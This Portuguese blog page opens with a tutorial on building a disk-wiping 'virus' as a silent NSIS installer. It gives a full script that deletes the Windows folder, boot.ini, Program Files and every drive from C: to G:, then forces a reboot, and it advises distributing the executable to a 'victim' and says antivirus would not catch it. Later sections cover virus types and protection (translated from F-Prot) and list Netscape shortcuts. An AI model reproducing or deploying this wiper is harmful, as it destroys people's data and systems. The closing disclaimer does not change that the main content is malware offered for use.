Vou mostrar como fazer um simples programinha devastador, que apaga TUDO do HD. Tanto os arquivos do usuário como as pastas do sistema e os programas. Ele será rodado no Windows, então alguns arquivos de sistema não serão apagados porque estarão em uso. Mas apagando a maioria e alguns estratégicos, já é o suficiente para que o computador nem inicie, a menos que a pessoa formate e reinstale tudo (mas aí ela já teria perdido seus dados).

Apagar arquivos... Sugiro usar o gerador de programas de instalação NSIS (Nullsoft Scriptable Install System). Ele é destinado a desenvolvedores e distribuidores de aplicações, mas é muito versátil. Você cria um "falso" programa de instalação, que na real não instala é nada, apenas apaga coisas. Esse NSIS funciona com um script, você cria um arquivo de texto com as instruções, compila nele, e ele gera o executável baseado nessas instruções. O uso do NSIS é uma boa também porque o executável fica extremamente pequeno, com menos de 50 kb. Mas você poderia usar, é claro, outros instaladores...

Baixe o NSIS em nsis.sourceforge.net e instale-o. Ele é gratuito (e open source). Não vamos nos deter com o script dele, vamos direto ao assunto. Ele possui uma função "Delete", que apaga arquivos ou pastas. Basta você adicionar os nomes de arquivos ou pastas desejados, e gerar o programa. Esta função deveria ser usada para apagar arquivos de um programa que seria desinstalado, já que o NSIS é um criador de programas de instalação para outros programas. Mas como apaga arquivos que você define, pode ser usada para o mal também, só depende das suas intenções. Em menos de 1 minuto seu vírus estará pronto.

Com o NSIS instalado, abra um editor de textos puro, como o Bloco de notas, e digite (ou copie e cole) o texto em vermelho:

!define PRODUCT_NAME "APAGADOR_XXX"
!define PRODUCT_VERSION "1.0"
!define PRODUCT_PUBLISHER "HACKER_XXX"

SetCompressor lzma

Name "{PRODUCT_NAME} {PRODUCT_VERSION}"
OutFile "MeuVirus.exe"
InstallDir "TEMP"
Icon "{NSISDIR}ContribGraphicsIconsmodern-install.ico"
SilentInstall silent

Section "Sec001" SEC01
Delete /REBOOTOK "WINDIR."
SectionEnd

Section -Post
Reboot
SectionEnd

Salve com a extensão ".nsi", e escolha "Todos os arquivos", no campo "Salvar como tipo". A extensão ".nsi" é a de projeto do NSIS, você poderia usar outra qualquer e depois abri-lo no compilador do NSIS ("Iniciar > Programas > MakeNSISW (Compiler GUI)").

Vamos entender esse arquivo... As três primeiras linhas identificam o "programa" que seria instalado, afinal o NSIS é um instalador. Deixe como está, ou escreva qualquer coisa, de preferência não palavras. O item "OutFile" é o executável que será gerado, é o seu vírus que deverá ser distribuído. A linha "SilentInstall silent" gera um instalador oculto, que não mostra nada na tela. Ou seja, quando a vítima executá-lo, ele já começará a apagar tudo sem mostrar nada.

Na seção "Sec01", você deve adicionar as entradas "Delete" que desejar. Existem outros comandos, é possível, em vez de apagar arquivos, criar entradas no registro, instalar programas que se auto-executam, etc. Não me pergunte como fazer isso.

A linha "Delete /REBOOTOK "WINDIR." apaga tudo da pasta do Windows, deixando para apagar na próxima inicialização o que estiver em uso. Copie-a e cole-a abaixo dela, antes do SectionEnd, trocando as pastas ou arquivos que você queira apagar. Por exemplo:

Delete /REBOOTOK "C:boot.ini"
Delete /REBOOTOK "C:Meus documentos."
Delete /REBOOTOK "C:."
Delete /REBOOTOK "D:."
Delete /REBOOTOK "E:."
Delete /REBOOTOK "F:."
Delete /REBOOTOK "G:."
Delete /REBOOTOK "C:Arquivos de programas."


Adicione o que quiser, arquivos específicos, etc.

A última seção, "Section -Post / Reboot / SectionEnd", será executada ao concluir o instalador, ou seja, quando ele terminar sua ação. O comando "reboot" reiniciará o computador, que na próxima inicialização nem inicia mais. Se você quiser, pode remover essas três últimas linhas, para deixar o usuário em desespero, vendo que tudo do seu PC foi apagado.

Salve o arquivo. Abra o compilador do NSIS, em "Iniciar > Programas > MakeNSISW (Compiler GUI)", clique no menu "File > Load script", localize o arquivo de extensão ".nsi" que você salvou. Ele já compilará, é rapidinho. NÃO CLIQUE NO BOTÃO "TEST INSTALLER".

O vírus está pronto! E, em condições normais, nenhum anti-vírus o detectaria, a menos que ele fosse parar nas mãos de algum criador de anti-vírus.

Como testá-lo sem se ferrar por conta da própria criação? Use máquinas virtuais! Já comentei aqui no Explorando sobre o Bochs, na seção de matérias do site Mep Sites (materias.mepsites.cjb.net) você encontra um tutorial dele. Pode usar também o QEMU, com a ajuda do Kemula (kemula.mepsites.cjb.net), se precisar. Ou o comercial e carinho VMware. Usando uma máquina virtual você ferra apenas o sistema virtual, que pode ser facilmente restaurado se você tiver uma cópia dele em CD ou outra pasta. Dica: use máquinas virtuais também para testar pela primeira vez programas que você pega na Internet, e mais: navegue na Internet só pela máquina virtual! Quanto ao seu "virusinho", se preferir, teste num PC cobaia, onde você saiba que tudo pode ser apagado. Leia a ajuda do NSIS para ver outros comandos e constantes de pastas.

Fácil, não?

Claro, isso é só um exemplo, ideal para lammers ou gente que se acha (e que na real não sabe é nada). Ou mesmo para quem está curioso e iniciando. Para fazer vírus específicos é recomendável dominar uma linguagem de programação. E lembre-se: você deve saber o que o vírus fará, o que ele vai atacar, e mais, saber como atacar. Não adianta querer ver a agenda do celular da namorada se você não souber onde ela guarda o celular. Não adianta querer ferrar um programa se você não souber que arquivos ou chaves do registro ele utiliza.

Por essas e outras, muito, muito cuidado ao abrir programas da Internet. Não clique naqueles banners de propaganda suspeitos, com carinhas lindas. Não clique no anúncio "Almente o tamanho do seu pênis". Não veja as montagens de fotos que não sei quem fez de você com não sei quem lá, e que te deixou um recado no orkut. Cuidado com os joguinhos em flash "executáveis"; se eles forem de origem desconhecida, tome mais cuidado ainda, prefira ver as versões em páginas HTML com o ".swf" separado. Mesmo se foi um amigo confiável que te passou, ele pode ter pego num site malicioso sem saber, ou então recebeu do primo do colega do vizinho da tia de outra cidade. Se você navega na Internet e mantém arquivos importantes no seu computador, considere o uso de uma conta de usuário restrita para navegar, ou use a conta de "Convidado", é o melhor a ser feito. Mantenha suas partições no Windows formatadas em NTFS, pois ao usar uma conta restrita, ela não terá acesso completo aos arquivos do sistema nem das outras pastas. Se o apagador que mostrei como criar, por exemplo, fosse rodado com uma conta de usuário restrita numa partição em NTFS, ele não conseguiria apagar praticamente NADA da pasta do Windows nem das outras pastas. O maior estrago seria na conta de usuário usada para rodá-lo, por isso se fosse um usuário restrito ou o convidado, seus arquivos estariam a salvo. Note que mesmo em NTFS, se você usasse a conta de administrador, boa parte dessa proteção iria por água abaixo, já que normalmente os administradores podem apagar arquivos do sistema e das outras pastas. E um programa executado como administrador, tem todos os direitos concedidos à conta de administrador. Ao instalar um programa, desmarque na instalação tudo o que for suspeito, especialmente se não estiver documentado. Muitas barras de ferramentas extras que aparecem no seu navegador foram instaladas junto com algum programa que você instalou "conscientemente", clicando em tudo, sem ler nada. LEIA. LEIA TUDO O QUE PUDER. Muitos spywares são documentados na licença de uso de um software, e muitos brasileiros que já não têm costume de ler mesmo, assim instalam ele sem saber. Um software que se preze e que respeite seus usuários deixa bem claro suas condições de uso, você só usa se concordar. E nada mais justo, se não concordar, simplesmente NÃO UTILIZE.

Uma dica para usuários do Windows XP ou as versões superiores. Ao rodar um programa suspeito, ou animações em flash executáveis, joguinhos que se dizem que "não precisa instalar", etc, o Windows pode desativar algumas alterações que o programa tente realizar. Por exemplo, ele não conseguirá alterar NADA no registro, o que é uma grande vantagem. Claro, se o programa depender disso para funcionar, nada feito, ele não irá rodar ou mostrará uma série de mensagens de erro. Executar programas confiáveis assim pode fazer com que eles não funcionem também, pois é comum um programa ler e gravar dados no registro ao ser aberto ou fechado. Já um joguinho "não instalável" ou uma animação em flash não deveria fazer nada isso, né? Para executar um programa no modo restrito: clique com o botão direito do mouse no ícone do mesmo, escolha "Executar como". Deixe selecionado o seu nome de usuário, e deixe marcado o item "Proteger meu computador e meus dados contra atividades não autorizadas de programas". Dê OK. Abrindo o programa assim, entre outras coisas, ele não poderá alterar nada no registro do Windows. Se o item "Executar como" não aparecer no menu, selecione o arquivo, segure SHIFT e clique com o direito nele.

Para programas suspeitos ou totalmente desconhecidos, eu recomendo testar em máquinas virtuais, como comentei mais acima. É melhor. Se der pau, dá só nela (a menos que você tenha arquivos no seu PC na rede compartilhados com permissão de escrita). Apague o arquivo do HD virtual e recopie a pasta. É mais prático do que usar uma máquina cobaia, tendo que reinstalar ou reparar tudo.

Enfim, esta dica tem diversos públicos. Não estou incentivando o mal, mas tirando uma curiosidade de muita gente sobre os vírus. O uso que se fará dela é de responsabilidade de cada um, né?! Um martelo pode ser usado na construção da sua casa, dos seus móveis. Mas pode também servir também para estourar seus miolos. Tudo é relativo.

Espero que você use o que leu aqui com responsabilidade. "Sexo? Use camisinha". "Internet? Juízo, previna-se dos vírus". Boa sorte!

Vírus de Computador: Uma introdução



Os vírus possuem certo conjunto de características:

#1 Um vírus é um programa que pode criar cópias de si mesmo (replicação), possivelmente modificadas.

#2 A replicação é intencional e não apenas um efeito secundário.

#3 Alguns dos replicantes são também vírus, mantendo as mesmas características.

#4 Um vírus precisa anexar-se a um 'arquivo anfitrião', que quando é executado também executa o vírus.

#1 Há diferenças entre vírus e programas que não replicam-se, como as bombas ANSI.

#2 Há diferenças também entre vírus e programas como DISKCOPY.COM, que podem replicar-se.

#3 Alguns programas tentam replicar-se mas não conseguem e não são considerados vírus.

#4 Há distinção entre vírus e worms, que não requerem um arquivo anfitrião.

O Trojan é um programa que pretende fazer algo útil (ou pelo menos interessante), mas quando é executado pode causar efeitos prejudiciais, como embaralhar a FAT (Tabela de Localização dos Arquivos), formatar o disco rígido ou executar um vírus.

Vírus e Trojans podem conter uma 'bomba-relógio', que podem apagar programas ou dados em uma data específica ou quando ocorrerem determinadas circunstâncias.

A 'bomba-relógio' freqüentemente é prejudicial por fazer algo como formatar o disco rígido. Muitas vezes é pouco prejudicial podendo: tornar muito lento o computador todas as Sextas-feiras ou criar uma bolinha que movimenta-se pela tela.

Mas não há nenhum vírus inocente. Até mesmo um vírus programado para não causar danos, pode fazê-lo devido à incompetência do programador do vírus ou por existirem versões de software e hardwares não previstos.

Um vírus não aparece do nada, tem que ser escrito como qualquer outro programa e portanto poderá ser modificado por qualquer pessoa, surgindo então outra versão, normalmente mais danosa.

Um vírus pode causar o apagamento de dados ou programas e até reformatar o disco rígido, mas danos mais sutiis também são possíveis. Alguns vírus podem modificar os dados gravados ou introduzir erros de digitação, mas outros apenas replicam-se.

Os três principais grupos de vírus em PCs são os vírus do setor de boot (BSV), vírus de programas e vírus de macro.

Um BSV infecta setores de boot em discos rígidos e disquetes. O setor de boot dos disquetes normalmente contém o código para carregar os arquivos do sistema operacional. O BSV substitui o setor de boot original por ele mesmo, apagando ou armazenando o boot original em outro lugar no disquete. Quando um computador é inicializado com este disquete, o vírus toma o controle e esconde-se na RAM. Então inicializará e executará o setor de boot original do computador e tudo parecerá normal. Mas todos os disquetes inseridos no computador serão infectados com o vírus, a menos que estejam protegidos contra gravação.

Um BSV normalmente esconde-se na memória alta e reduz a quantidade de memória lida pelo DOS (640K poderiam aparecer como 639K).

A maioria do BSVs também pode infectar discos rígidos, sendo o processo semelhante ao descrito acima, mas normalmente infectam o Master Boot Record (MBR) em vez do DOS Boot Record nos disquetes.

Vírus de Programas, o segundo tipo de vírus de computador, infectam programas executáveis, usualmente arquivos .COM e .EXE, mas também podem infectar drivers de dispositivo, (overlay files e object files).

Um programa infectado conterá uma cópia do vírus, normalmente no fim, mas também no começo ou no meio do programa original.

Quando um programa infectado é executado, o vírus pode ficar residente na memória e infectar todos os outros programas executados. Os que usam este método para replicar-se são os chamados 'Vírus Residentes'.

Alguns vírus podem procurar por outro arquivo para infectar quando o programa infectado é executado e após replicar-se, deixa o programa ser executado. Os que usam este método são os 'Vírus de Ação Direta'. Alguns vírus usam ambos os métodos de infecção.

A maioria dos vírus tentam reconhecer infecções existentes, então não infectam novamente. Isto torna possível vacinar contra vírus específicos, fazendo a 'vítima' parecer infectada. Mas este método não funciona como uma proteção geral, porque não é possível vacinar o mesmo programa contra
múltiplos vírus.

O terceiro tipo são os vírus de macro. Não infectam programas normais mas disseminam-se como 'macros' em arquivos do tipo 'Processador de Texto' ou 'Planilhas'. Este tipo de vírus pode disseminar-se facilmente por E-mail, quando os usuários trocam arquivos sem saberem da infecção.


Em geral, vírus são apenas programas - programas bastante incomuns,mas precisam ser escritos como qualquer outro programa. Não é necessário ser gênio para escrever um - muitas crianças de dez anos (?) podem criar vírus fácilmente.

Para corrigir alguns conceitos errôneos, mas bastante comuns, aqui estão algumas informações sobre o que um vírus não pode fazer.

Um disquete protegido contra gravação não pode ser infectado, se o drive de disquete não tiver problemas.

Um vírus não pode infectar um computador a menos que seja feito um boot de um disquete infectado ou algum programa infectado seja executado. Mas é possível para uma infecção de vírus disseminar-se, apenas pela leitura de um arquivo infectado do Microsoft Word ou do Lotus Notes, por exemplo.

Vírus para computadores Macintosh não podem infectar PCs e vice-versa, mas há alguns vírus de macro que podem infectar arquivos do WinWord e também do MacWord.

Além de usar programas anti-vírus, há outros modos de proteger seu computador contra vírus:

Regra #1: FAÇA BACKUP!!!

Mantenha bons backups (mais de um) de tudo que não pode perder. Isto não só o protegerá de problemas causados por vírus, mas também é necessário no caso de um sério problema de hardware.

Nunca dê um boot de disquete, por ser essa a única maneira de infectar o setor de boot do disco rígido com um vírus de boot.

Se for deixado um disquete no drive A:\ e o computador for ligado, a mensagem: 'Este não é um disco de sistema' pode aparecer na tela. Se o disquete estiver infectado, o vírus estaria ativado, mas provavelmente não teria ainda infectado o disco rígido (entretanto, a maioria dos vírus de boot fará isto imediatamente).
Se isto acontecer, remova o disquete do drive e desligue o computador. É importante saber que o comando 'Ctrl-Alt-Del' ou apertar o botão Reset não é suficiente, porque alguns vírus podem sobreviver a isso.
Se houver suspeita de contaminação do disquete, faça então o boot com um disquete de boot comprovadamente 'limpo' e após execute um anti-vírus.

Se o BIOS do computador permitir mudar a ordem de boot de: 'A:\' para 'C:\', lhe dará melhor proteção contra vírus de boot.

Mantenha todos os disquetes protegidos contra gravação, a menos que precise gravar algo.

Quando conseguir um novo software em disquete, proteja o disquete antes de fazer a instalação.

Geralmente, os softwares comercializados em embalagens lacradas deveriam estar 'limpos', mas existiram alguns casos documentados de softwares infectados, inclusive drivers de hardwares, e a Microsoft distribuiu arquivos infectados algumas vezes no passado.

Softwares de domínio-público, Freeware e pacotes de Shareware não são mais perigosos que os programas comerciais regulares; tudo depende da fonte.

Verifique com programas anti-vírus, todos os disquetes que receber. Pode ser aconselhável usar mais de um programa, porque nenhum deles pode descobrir 100% dos vírus existentes.

Observe qualquer 'comportamento incomum' do seu computador, como:

Leva mais tempo que o normal para inicializar programas?
Mensagens de erro incomuns aparecem?
O tamanho de memória parece ter diminuído?
As luzes do disco rígido ou disquete ficam ligadas mais tempo que o normal?
Arquivos desaparecem?

Qualquer coisa assim poderia indicar um vírus, ou apenas que o Windows está com problemas.

Se seu computador estiver infectado com um vírus - NÃO ENTRE EM PÂNICO!

Às vezes um procedimento errado para tentar remover o vírus, fará muito mais danos do que o vírus poderia ter feito. Se não tiver certeza do que fazer, deixe seu computador desligado até falar com alguém habilitado para remover o vírus. ( swordcomputadores@altavista.net )

Lembre-se que alguns vírus podem interferir com a operação de desinfecção se estiverem ativos na memória. Antes de tentar desinfetar o computador é necessário dar o boot com um disquete de sistema
comprovadamente 'LIMPO' e protegido contra gravação desde sua gravação original.

Também é necessário dar o boot com um disquete de sistema limpo, antes de verificar o computador com um anti-vírus, pois muitos dos vírus chamados 'stealth' (ocultos ou sub-reptícios) ficam ativos na memória e não são detectados.

O texto original em Inglês, acompanha o programa anti-vírus F-Prot.


No Laboratório de Biologia do Colégio Estadual Júlio de Castilhos em Porto Alegre, existem vários vidros com espécimes animais, inclusive fetos humanos, imersos em solução conservante. Em um dos vidros encontramos um disquete 3 1/2", sem a capa protetora, com a etiqueta:
'Vírus de Computador - Nome Científico: Vírus Natas 4044'.


Netscape: alguns atalhos e curiosidades




Consiga certas informações extras, digitando no endereço da barra de status o seguinte:

about:plugins
Mostra os plug-ins instalados.

about:cache, about:memory-cache, about:image-cache
Mostra o conteúdo do cache do Netscape.

about:global
Mostra todos os arquivos que funcionam como links, com nome e data em que foram visitados.

Nota: "about:global", ":cache", ":memory-cache" e ":image-cache" só funcionam como links na versão 4

about:mozilla
Sabe quem é o mozilla? E por que ele não é chamado de netzilla?
A Netscape Communications foi originalmente chamada de Mosaic Communications, até que o NCSA reclamou sobre violação de marcas registradas em 1994. Isto aconteceu antes da versão 1.0 mas o mascote mozilla manteve-se por perto e o domínio www.mcom.com ainda estava registrado pela Netscape.
Antes da versão 0.9x, o Netscape (que não se chamava Navigator até que houve a mudança de nome da companhia) tinha o logo da Mosaic Communications (um M sobre um círculo, acima de um pálido retângulo giratório).


Dicas no Windows

A tecla de atalho 'FishCam' é: ctrl-alt-f

Para ocultar/mostrar a barra de status inferior: ctrl-alt-s

Enquanto a página estiver baixando: ctrl-alt-t

Mande recarregar a página e então digite: ctrl-alt-t para ver como funciona.

Quando for digitar uma URL www, pode omitir o ' http:// '.

Quando for digitar uma URL ftp, pode omitir o ' ftp:// '.

Quando for digitar um ' www.domínio.com', pode digitar apenas o domínio.
Não funciona com muitos '.com.br'.

Se o 'Show Locations' ou 'Barra de Endereços' estiver aparecendo, a palavra 'location' ou 'endereço' mudará para 'netsite', quando estiver conectando com um site hospedado sob a marca de servidor Netscape.
Vá para a home page da Netscape por exemplo.

Para evitar fornecer seu nome e senha cada vez que acessar um site ou ftp protegido por senha, pode salvar a URL como um bookmark (marcador) no seguinte formato:
ftp://usuário:senha@ftp.algumlugar.com/
http://usuário:senha@www.algumlugar.com/

view source (origem da página)
Adicione 'view-source:' ao começo de alguma URL para abri-la na janela 'view source' (origem da página).


Estas Informações foram adaptadas e traduzidas do:
http://www.mods.com/hackersguide/eggs/eggs-url.html.

0 Comentários:

Postar um comentário

Assinar Postar comentários [Atom]

<< Página inicial